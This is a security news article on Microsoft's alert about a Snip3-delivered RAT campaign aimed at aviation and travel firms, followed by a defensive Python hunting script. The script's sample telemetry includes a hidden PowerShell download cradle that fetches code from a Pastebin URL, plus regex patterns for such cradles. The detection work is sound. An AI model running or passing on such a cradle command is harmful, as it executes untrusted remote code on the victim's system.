Microsoft has alerted the aerospace and travel sectors to a new targeted spear-phishing campaign that deploys several remote access trojans (RATs) via a modern, stealthy malware loader.
The tech giant said it had been closely tracking the evolving campaign for months. Microsoft Security Intelligence tweeted a screenshot of a phishing email impersonating a reputable company and requesting a freight charter quotation.
Once running, the malware “steals credentials, screenshots and webcam data, window and clipboard data, system and network data, and often exfiltrates data via SMTP port 587.” The trojan continuously re-runs its components until it manages to inject into RegAsm, InstallUtil, or RevSvcs. RegAsm and InstallUtil are signed .NET Framework utilities, so the implant's network traffic appears to originate from trusted Microsoft binaries rather than from an unknown executable.
Microsoft wrote, “The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads.”
Morphisec last week identified the loader that drops the RATs as a “highly sophisticated” crypter-as-a-service called “Snip3,” which is used to deliver Revenge RAT, AsyncRAT, Agent Tesla, and NetWire RAT payloads to compromised computers. According to Morphisec, Snip3 can also detect sandboxes and virtual machines, making it especially capable of evading detection-centric anti-malware solutions.
To avoid detection, the loader relies on several tactics: executing PowerShell code with the ‘remotesigned’ execution-policy parameter, staging payloads on Pastebin and top4top, checking for Windows Sandbox and VMware virtualization before detonating, and compiling RunPE loaders on the endpoint at runtime so that no prebuilt injector binary is written to disk.
Microsoft says its Microsoft 365 Defender product detects the various components of the threat, but it advises companies in the targeted industries to investigate whether they have been affected. It released a set of advanced hunting queries so that organizations can look for related behaviors, emails, implants, and other signs of an attack.
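As an added example (not Microsoft's or Morphisec's code, and not one of Microsoft's published hunting queries), the following Python sketches the kind of hunting logic the indicators above suggest: PowerShell spawned by a script host such as wscript.exe with a RemoteSigned policy or a download cradle, command lines that reference the Pastebin or top4top staging sites, and a .NET utility such as RegAsm.exe or InstallUtil.exe opening an outbound connection on TCP 587. The telemetry records, their field names, the hostnames and the paste URL are all constructed for the example; the rule names are assumptions.

```python
"""Toy hunting logic for the loader/RAT tradecraft described in the article.

Added example, not Microsoft's or Morphisec's code. The event records below
are constructed to resemble Sysmon/EDR process-creation and network-connection
telemetry; field names ("type", "host", "image", "parent", "cmdline", ...) are
assumptions, not a real product schema.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Script hosts that the VBScript stage would use to launch PowerShell.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Legitimate web services the article names as staging points for later stages.
STAGING_SITES = ("pastebin.com", "top4top")
# .NET utilities the article names as injection targets (RevSvcs as written there).
DOTNET_UTILITIES = {"regasm.exe", "installutil.exe", "revsvcs.exe"}
# "-ExecutionPolicy RemoteSigned" and its common abbreviations (-ex..., -ep).
REMOTESIGNED_RE = re.compile(r"-(?:ex\w*|ep)\s+remotesigned", re.I)
# Typical in-memory download cradle tokens.
CRADLE_RE = re.compile(r"\biex\b|downloadstring|invoke-expression|frombase64string", re.I)

# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS = [
    # Benign: an admin running a local script from Explorer.
    {"type": "process", "host": "ws01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    # Benign: a logon VBScript that maps drives via PowerShell, no cradle, no policy override.
    {"type": "process", "host": "ws04",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"powershell.exe -File C:\logon\map_drives.ps1"},
    # Suspicious: wscript-launched PowerShell, RemoteSigned, cradle pulling from Pastebin.
    {"type": "process", "host": "ws02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -w hidden -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/a1b2c3d4')\""},
    # Suspicious: RegAsm.exe (a .NET Framework tool) talking SMTP submission to the internet.
    {"type": "network", "host": "ws02",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "dst": "mail.example.net", "dst_port": 587},
    # Benign: Outlook using SMTP submission, the expected source of port 587 traffic.
    {"type": "network", "host": "ws03",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dst": "smtp.office365.com", "dst_port": 587},
]


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    evidence: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events) -> list:
    """Apply the three indicator rules to a list of telemetry records."""
    findings = []
    for ev in events:
        host, image = ev["host"], basename(ev.get("image", ""))
        if ev["type"] == "process":
            parent, cmd = basename(ev.get("parent", "")), ev.get("cmdline", "")
            # Rule 1: script host -> PowerShell with a policy override or an in-memory cradle.
            if image == "powershell.exe" and parent in SCRIPT_HOSTS and (
                    REMOTESIGNED_RE.search(cmd) or CRADLE_RE.search(cmd)):
                findings.append(Finding(host, "script_host_spawned_powershell", cmd))
            # Rule 2: staging site named on the command line.
            if any(site in cmd.lower() for site in STAGING_SITES):
                findings.append(Finding(host, "staging_site_in_cmdline", cmd))
        elif ev["type"] == "network":
            # Rule 3: .NET utility opening SMTP submission (587); these tools have no reason to.
            if image in DOTNET_UTILITIES and ev.get("dst_port") == 587:
                findings.append(Finding(host, "dotnet_utility_smtp_587",
                                        f"{image} -> {ev.get('dst')}:587"))
    return findings


def score_hosts(findings) -> dict:
    """Distinct rules hit per host; a chain of different rules is far stronger than one hit."""
    rules = defaultdict(set)
    for f in findings:
        rules[f.host].add(f.rule)
    return {host: len(hit) for host, hit in rules.items()}


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.host}: {f.rule}: {f.evidence}")
    print("per-host score:", score_hosts(results))
```

Each rule on its own has benign matches (port 587 is normal for mail clients, and plenty of logon scripts spawn PowerShell), which is why the example scores hosts by the number of distinct rules rather than alerting on any single hit; in the constructed data only the infected host trips more than one.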